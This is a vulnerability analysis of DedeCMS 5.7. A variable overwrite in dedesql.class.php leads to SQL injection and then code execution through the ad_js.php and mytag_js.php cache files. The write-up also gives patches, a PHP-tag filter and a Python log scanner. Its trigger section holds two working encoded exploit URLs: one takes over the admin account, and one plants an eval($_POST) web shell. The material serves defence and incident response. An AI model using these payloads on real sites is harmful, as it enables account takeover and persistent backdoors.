Contents

1. Vulnerability description
2. Vulnerability trigger conditions
3. Affected scope
4. Vulnerable code analysis
5. Defenses
6. Offense and defense thoughts

1. Vulnerability description

This vulnerability can be summarized briefly as follows:

. "/plus/download.php" includes the file "/include/common.inc.php"
. "/include/common.inc.php" performs "local variable registration" of user-supplied variables; if a registered variable has not been explicitly initialized, this leads to local variable overwriting
. "/include/common.inc.php" includes "/include/dedesql.class.php"
. The vulnerable "/include/dedesql.class.php" does "not" initialize the two arrays $arrs1 and $arrs2, so an attacker can overwrite these two variables through external input
. By POSTing a specially crafted request to "/plus/download.php", the attacker overwrites the $arrs1 and $arrs2 arrays and ultimately pollutes the "table-prefix variable $cfg_"; this "table-prefix variable $cfg_" is carried into the database SQL query, causing SQL injection
. "/plus/ad_js.php" and "/plus/mytag_js.php" query the PHP code just injected from the database, write it into a cache file, and include() it, ultimately leading to code execution

Relevant Link:

http://bbs.safedog.cn/thread-52264-1-1.html
http://www.2cto.com/Article/201205/129974.html
http://www.91ri.org/6462.html
http://phpinfo.me/2013/12/24/111.html

2. Vulnerability trigger conditions

. POC: change the administrator password:
http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
// afterwards, log in as user spider with password admin
. POC: insert a backdoor into the database
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
// requires visiting plus/mytag_js.php?aid=1; this generates x.php in the plus directory, password m
. "/include/dedesql.class.php" does "not" initialize the two arrays $arrs1 and $arrs2
. "/plus/ad_js.php" and "/plus/mytag_js.php" do not effectively filter or check the data queried from the database
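For incident response, the PoC shape above is easy to spot in web-server logs. As an added example (not from the original post or from DedeCMS), this Python scanner finds requests carrying arrs1[]/arrs2[] arrays and decodes them the same way dedesql.class.php does with chr(), so an analyst can read off which global a request tried to overwrite and what it tried to append. The log lines are constructed samples; the arrs1 code points are those of the PoC above, arrs2 is a short constructed suffix.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from a real server). The second
# request carries arrs1[]/arrs2[] arrays in the shape of the PoC above: the
# arrs1 code points spell "cfg_dbprefix", arrs2 is a short constructed suffix.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2014:10:00:00 +0800] "GET /plus/download.php?open=1&aid=3 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2014:10:00:01 +0800] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=88&arrs2[]=96&arrs2[]=32 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_chr_array(values):
    """Rebuild the string dedesql.class.php would assemble with chr() from a
    list of decimal code points; non-numeric or out-of-range items are skipped."""
    return "".join(chr(int(v)) for v in values if v.isdigit() and int(v) < 256)

def analyze_request(url):
    """Return a finding when the URL smuggles arrs1[]/arrs2[] arrays, else None.
    The finding names the global that would be overwritten and the appended text."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    if "arrs1[]" not in query and "arrs2[]" not in query:
        return None
    target = decode_chr_array(query.get("arrs1[]", []))
    return {
        "path": parts.path,
        "target": target,
        "appended": decode_chr_array(query.get("arrs2[]", [])),
        # Overwriting a cfg_* global (the table prefix in this case) is what
        # carries the payload into SQL; any other use is still unexpected.
        "severity": "high" if target.startswith("cfg_") else "medium",
    }

def scan_log(text):
    """Run analyze_request() over every request line of an access log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            finding = analyze_request(m.group(1))
            if finding:
                findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['path']}: ${f['target']} .= {f['appended']!r}")
```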

0x1: Manual verification


http://localhost/dedecms5.7/plus/ad_js.php?aid=21

3. Affected scope

. DedeCMS v5.
. <= DedeCMS v5.

4. Vulnerable code analysis

5. Defenses

0x1: /include/dedesql.class.php

/* fix: explicitly initialize both arrays so that "variable local registration" cannot pre-fill them from user input */
$arrs1 = array();
$arrs2 = array(); // special operation
if(isset($GLOBALS['arrs1']))
{
    $v1 = $v2 = '';
    for($i=0; isset($arrs1[$i]); $i++)
    {
        $v1 .= chr($arrs1[$i]);
    }
    for($i=0; isset($arrs2[$i]); $i++)
    {
        $v2 .= chr($arrs2[$i]);
    }
    $GLOBALS[$v1] .= $v2;
}
/* end fix */

0x2: /plus/ad_js.php

...
/* Reject an ad body that contains PHP code, and purge the poisoned row and its cache file */
function find_ad_payload($adbody, $aid)
{
    global $db;
    $express = "/<\?[^><]+(\?>){0,1}|<\%[^><]+(\%>){0,1}|<\%=[^><]+(\%>){0,1}|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*(<\/script\s*>){0,1}/iU";
    if (preg_match($express, $adbody))
    {
        $sql = " DELETE from `#@__myad` WHERE aid='$aid' ";
        $rs = $db->ExecuteNoneQuery($sql);
        if( file_exists(DEDEDATA . '/cache/myad-'.$aid.'.htm') )
        {
            @unlink(DEDEDATA.'/cache/myad-'.$aid.'.htm');
        }
        die("Request Error!");
    }
}

if(isset($arcID)) $aid = $arcID;
$arcID = $aid = (isset($aid) && is_numeric($aid)) ? $aid : 0;
if($aid==0) die(' Request Error! ');

$cacheFile = DEDEDATA.'/cache/myad-'.$aid.'.htm';
if( isset($nocache) || !file_exists($cacheFile) || time() - filemtime($cacheFile) > $cfg_puccache_time )
{
    $row = $dsql->GetOne("SELECT * FROM `#@__myad` WHERE aid='$aid' ");
    $adbody = '';
    if($row['timeset']==0)
    {
        $adbody = $row['normbody'];
    }
    else
    {
        $ntime = time();
        if($ntime > $row['endtime'] || $ntime < $row['starttime']) {
            $adbody = $row['expbody'];
        } else {
            $adbody = $row['normbody'];
        }
    }
    /* check the freshly loaded body before it is written to the cache */
    find_ad_payload($adbody, $aid);
...

0x3: /plus/mytag_js.php

...
/* Reject a tag body that contains PHP code, and purge the poisoned row and its cache file */
function find_tag_payload($tagbody, $aid)
{
    global $db;
    $express = "/<\?[^><]+(\?>){0,1}|<\%[^><]+(\%>){0,1}|<\%=[^><]+(\%>){0,1}|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*(<\/script\s*>){0,1}/iU";
    if (preg_match($express, $tagbody))
    {
        $sql = " DELETE from `#@__mytag` WHERE aid='$aid' ";
        $rs = $db->ExecuteNoneQuery($sql);
        if( file_exists(DEDEDATA . '/cache/mytag-'.$aid.'.htm') )
        {
            @unlink(DEDEDATA.'/cache/mytag-'.$aid.'.htm');
        }
        die("Request Error!");
    }
}

if(isset($arcID)) $aid = $arcID;
$arcID = $aid = (isset($aid) && is_numeric($aid)) ? $aid : 0;
if($aid==0) die(" document.write('Request Error!'); ");

$cacheFile = DEDEDATA.'/cache/mytag-'.$aid.'.htm';
//die(var_dump($cacheFile));
if( isset($nocache) || !file_exists($cacheFile) || time() - filemtime($cacheFile) > $cfg_puccache_time )
{
    $pv = new PartView();
    $row = $pv->dsql->GetOne(" SELECT * FROM `#@__mytag` WHERE aid='$aid' ");
    if(!is_array($row))
    {
        $myvalues = "<!--\r\ndocument.write('Not found input!');\r\n-->";
    }
    else
    {
        $tagbody = '';
        if($row['timeset']==0)
        {
            $tagbody = $row['normbody'];
        }
        else
        {
            $ntime = time();
            if($ntime>$row['endtime'] || $ntime < $row['starttime']) {
                $tagbody = $row['expbody'];
            }
            else {
                $tagbody = $row['normbody'];
            }
        }
        /* check the body before it is handed to the template engine */
        find_tag_payload($tagbody, $aid);
        $pv->SetTemplet($tagbody, 'string');
...


It is important to note that, for this DedeCMS database-backdoor attack vector, the defensive code has to take the following into account:

. PHP start and end tags are very flexible
    1) <?php ... ?>
    2) <? ... ?>
    3) <script language="php">...</script>
    4) <?=expression ... ?>
    5) <% ... %>
    6) <%=$variable %>
. PHP allows half-open tags: when PHP and HTML are mixed, PHP code at the very end of the file runs correctly without a closing tag
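To confirm that the filter above really covers each tag form just listed, here is an added example (not from the original post or from DedeCMS) that ports the preg_match() pattern from find_tag_payload() to Python and runs it over constructed ad/tag bodies. It also shows the cost of the broad `<?` alternative: an XML declaration is flagged as well. Assumed: PCRE's /U modifier can be dropped for a yes/no check, because greediness changes which span matches, not whether one exists.

```python
import re

# Python port of the preg_match() pattern used by find_ad_payload() /
# find_tag_payload() above. PCRE /i becomes re.IGNORECASE; /U (ungreedy) only
# changes which span is matched, not whether a match exists, so it is dropped.
PHP_TAG_RE = re.compile(
    r"<\?[^><]+(\?>){0,1}"
    r"|<\%[^><]+(\%>){0,1}"
    r"|<\%=[^><]+(\%>){0,1}"
    r"|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*(<\/script\s*>){0,1}",
    re.IGNORECASE,
)

def contains_php_tag(body):
    """True if the body contains any PHP open-tag form the filter knows about."""
    return PHP_TAG_RE.search(body) is not None

# Constructed sample ad/tag bodies: one per tag form listed above, a half-open
# tag with no closing ?>, an upper-case variant, benign content, and an XML
# declaration that the broad "<?" alternative cannot tell apart from PHP.
SAMPLES = {
    "full":          "<?php echo 1; ?>",
    "short":         "<? echo 1; ?>",
    "script":        '<script language="php">echo 1;</script>',
    "echo":          "<?=$x ?>",
    "asp":           "<% echo 1; %>",
    "asp_echo":      "<%=$variable %>",
    "half_open":     "text before <?php echo 1; no closing tag",
    "upper":         "<SCRIPT LANGUAGE=PHP>echo 1;</SCRIPT>",
    "benign_html":   '<div class="ad"><a href="/x">ad</a></div>',
    "benign_js":     "document.write('hello');",
    "benign_script": '<script type="text/javascript">var a = 1;</script>',
    "xml_decl":      '<?xml version="1.0"?><ad/>',
}

def classify(samples):
    """Map each sample name to whether the filter would reject that body."""
    return {name: contains_php_tag(body) for name, body in samples.items()}

if __name__ == "__main__":
    for name, flagged in classify(SAMPLES).items():
        print(f"{name:14s} {'REJECT' if flagged else 'allow'}")
```

The xml_decl case is a false positive worth knowing about: a legitimate ad body that starts with an XML declaration would be deleted along with its cache file.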

0x4: Cleaning up dirty data

$cacheFile = DEDEDATA.'/cache/mytag-'.$aid.'.htm';
/* clear dirty data: re-check a cache file that may have been written before the fix was deployed */
if(file_exists($cacheFile))
{
    $tmpcheck = file_get_contents($cacheFile);
    find_tag_payload($tmpcheck, $aid);
}
/* end clear dirty data */
if( isset($nocache) || !file_exists($cacheFile) || time() - filemtime($cacheFile) > $cfg_puccache_time )
{

The same approach applies to ad_js.php.

6. Offense and defense thoughts

None yet.

Copyright (c) 2014 LittleHann All rights reserved
